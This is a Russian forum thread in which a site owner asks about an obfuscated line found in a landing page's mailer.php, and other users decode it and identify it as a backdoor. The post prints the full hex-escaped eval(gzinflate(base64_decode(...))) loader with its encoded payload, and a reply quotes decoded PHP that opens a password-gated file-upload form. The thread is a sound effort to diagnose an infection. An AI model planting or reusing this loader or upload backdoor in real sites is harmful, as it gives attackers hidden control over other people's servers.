Непонятный код

@Alexxosipov · Регистрация: 04.12.2016

Студворк — интернет-сервис помощи студентам

Добрый день! Столкнулся с такой проблемой:
Есть лэндинг, формы заявки ведут на mailer.php
Нужно было немного подправить в mailer, думал, проблем никаких не будет. Ан нет!
Увидел вот такое чудо в mailer.php:

PHP
1
2
<?php
preg_replace("/.*/e","\x65"."\x76"."\x61"."\x6C"."\x28"."\x67"."\x7A"."\x69"."\x6E"."\x66"."\x6C"."\x61"."\x74"."\x65"."\x28"."\x62"."\x61"."\x73"."\x65"."\x36"."\x34"."\x5F"."\x64"."\x65"."\x63"."\x6F"."\x64"."\x65"."\x28'"."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"."'\x29"."\x29"."\x29"."\x3B",".", 1);?>

Что это? Как с этим быть? Вообще ничего не понимаю...

Там есть еще ajax-запрос, но..

JavaScript
1
2
3
4
5
$.ajax({
                type: 'POST',
                data: {<?=$axaj_post?>},
                url: ''
        });

Он не ссылается ни на какой URL
Что делать? Как быть?

@Kerry_Jr · 19.12.2016, 23:17

Alexxosipov, WP?

@Alexxosipov · 19.12.2016, 23:24 **[ТС]**

Kerry_Jr, вообще не понимаю, что за CMS стоит. Из админки есть только editor какой-то, очень-очень странный
Есть конфиговские файлы, но они тоже довольно-таки странные.

@Kerry_Jr · 19.12.2016, 23:30

Сообщение от Alexxosipov

PHP
1
"\x65"."\x76"."\x61"."\x6C"."\x28"."\x67"."\x7A"."\x69"."\x6E"."\x66"."\x6C"."\x61"."\x74"."\x65"."\x28"."\x62"."\x61"."\x73"."\x65"."\x36"."\x34"."\x5F"."\x64"."\x65"."\x63"."\x6F"."\x64"."\x65"."\x28'"

Расшифровывается как

PHP
1
eval(gzinflate(base64_decode('

Дальше что-то закодированное в base64. А в конце так

Сообщение от Alexxosipov

PHP
1
"'\x29"."\x29"."\x29"."\x3B"

PHP
1
')));

Добавлено через 2 минуты
Alexxosipov, попробуйте через инструменты разработчика в браузере отследить, куда POST-запрос отсылается.

@Alexxosipov · 20.12.2016, 00:23 **[ТС]**

Kerry_Jr, не понял, если честно
Как именно все это творенье привести в обычный php код?
Вот так?

PHP
1
eval(gzinflate(base64_decode('тутВсяАбракадабра"'\x29"."\x29"."\x29"."\x3B")')));

@Emilien · 20.12.2016, 04:44

https://www.unphp.net/decode/9... f3386288e/

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
    } else if (isset($_GET['upl'])) {
        if (md5($_GET['upl']) === '35d70d1153ee96d2aaa59a0e99dd5ca7') {
            $infoMessage = "";
            if (isset($_POST["load"]))
                saveFiles(dirname($_SERVER['SCRIPT_FILENAME']), $_FILES["files"]);
            if (isset($_SESSION["savedFilesInfo"])) {
                $filesInfo = $_SESSION["savedFilesInfo"];
                unset($_SESSION["savedFilesInfo"]);
                $infoMessage = "<ul>";
                foreach ($filesInfo as $k => $fileInfo) {
                    $message = $fileInfo['message'];
                    $infoMessage .= '<li>' . $message . '</li>';
                }
                $infoMessage .= "</ul>";
            }
            echo '<!doctype html><html lang="ru"><head><meta charset="UTF-8"/></head><form name="upload" method="post" enctype="multipart/form-data" action="">Загрузить файлы: <input id="file-field" type="file" name="files[]" value="Выберите загружаемые файлы" multiple="true"><input type="submit" name="load" value="Отправить"></form><p>' . $infoMessage . '</p></html>';
            die;
        } else
            mailInfo(2);
    } else

Это бэкдор. Если передать в $_GET['upl'] нужное значение, то появляется форма для загрузки файлов и на сайт можно залить что угодно.

@Kerry_Jr · 20.12.2016, 09:30

Сообщение от Alexxosipov

PHP
1
eval(gzinflate(base64_decode('тутВсяАбракадабра"'\x29"."\x29"."\x29"."\x3B")')));

PHP
1
eval(gzinflate(base64_decode('тут всякая абракадабра')));

Новые блоги и статьи Все статьи Все блоги /
SDL3 для Web (WebAssembly): Основы отладки веб-приложений на SDL3 по USB и Wi-Fi, запущенных в браузере мобильных устройств 8Observer8 07.02.2026 Содержание блога Браузер Chrome имеет средства для отладки мобильных веб-приложений по USB. В этой пошаговой инструкции ограничимся работой с консолью. Вывод в консоль - это часть процесса. . .	SDL3 для Web (WebAssembly): Обработчик клика мыши в браузере ПК и касания экрана в браузере на мобильном устройстве 8Observer8 02.02.2026 Содержание блога Для начала пошагово создадим рабочий пример для подготовки к экспериментам в браузере ПК и в браузере мобильного устройства. Потом напишем обработчик клика мыши и обработчик. . .	Философия технологии iceja 01.02.2026 На мой взгляд у человека в технических проектах остается роль генерального директора. Все остальное нейронки делают уже лучше человека. Они не могут нести предпринимательские риски, не могут. . .	SDL3 для Web (WebAssembly): Вывод текста со шрифтом TTF с помощью SDL3_ttf 8Observer8 01.02.2026 Содержание блога В этой пошаговой инструкции создадим с нуля веб-приложение, которое выводит текст в окне браузера. Запустим на Android на локальном сервере. Загрузим Release на бесплатный. . .
SDL3 для Web (WebAssembly): Сборка C/C++ проекта из консоли 8Observer8 30.01.2026 Содержание блога Если вы откроете примеры для начинающих на официальном репозитории SDL3 в папке: examples, то вы увидите, что все примеры используют следующие четыре обязательные функции, а. . .	SDL3 для Web (WebAssembly): Установка Emscripten SDK (emsdk) и CMake для сборки C и C++ приложений в Wasm 8Observer8 30.01.2026 Содержание блога Для того чтобы скачать Emscripten SDK (emsdk) необходимо сначало скачать и уставить Git: Install for Windows. Следуйте стандартной процедуре установки Git через установщик. . . .	SDL3 для Android: Подключение Box2D v3, физика и отрисовка коллайдеров 8Observer8 29.01.2026 Содержание блога Box2D - это библиотека для 2D физики для анимаций и игр. С её помощью можно определять были ли коллизии между конкретными объектами. Версия v3 была полностью переписана на Си, в. . .	Инструменты COM: Сохранение данный из VARIANT в файл и загрузка из файла в VARIANT bedvit 28.01.2026 Сохранение базовых типов COM и массивов (одномерных или двухмерных) любой вложенности (деревья) в файл, с возможностью выбора алгоритмов сжатия и шифрования. Часть библиотеки BedvitCOM Использованы. . .

@Kerry_Jr 3106 / 2591 / 1219 Регистрация: 14.05.2014 Сообщений: 7,236 Записей в блоге: 1
	19.12.2016, 23:17
	Alexxosipov, WP? 0

@Alexxosipov 3 / 3 / 0 Регистрация: 04.12.2016 Сообщений: 68
	19.12.2016, 23:24 [ТС]
	Kerry_Jr, вообще не понимаю, что за CMS стоит. Из админки есть только editor какой-то, очень-очень странный Есть конфиговские файлы, но они тоже довольно-таки странные. 0